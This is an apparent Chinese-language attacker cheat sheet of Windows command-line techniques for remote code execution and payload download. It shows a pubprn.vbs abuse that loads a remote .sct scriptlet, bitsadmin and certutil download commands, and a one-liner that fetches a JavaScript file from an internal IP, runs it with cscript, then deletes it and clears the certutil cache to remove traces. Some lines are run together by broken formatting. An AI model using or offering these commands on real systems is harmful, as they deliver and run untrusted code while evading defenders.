远程执行sct的另一种姿势
cscript /b C:WindowsSystem32Printing_Admin_Scriptszh-CNpubprn.vbs 127.0.0.1 script:https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct
detail:https://posts.specterops.io/wsh-injection-a-case-study-fd35f79d29dd
命令行下载姿势1
|
1
2
3
|
bitsadmin /rawreturn /transfer getfile http://download.sysinternals.com/files/PSTools.zip c:p.zipbitsadmin /rawreturn /transfer getpayload http://download.sysinternals.com/files/PSTools.zip c:p.zipbitsadmin /transfer myDownLoadJob /download /priority normal "http://download.sysinternals.com/files/PSTools.zip" "c:p.zip" |
命令行下载姿势2
|
1
|
certutil -urlcache -split -f http://192.168.254.102:80/a.txt b.txt |
清除缓存 certutil -urlcache -split -f http://192.168.254.102:80/a.txt delete
命令行执行远程JS
certutil -urlcache -split -f http://192.168.254.102:80/a a.js && cscript a.js && del a.js && certutil -urlcache -split -f http://192.168.254.102:80/a delete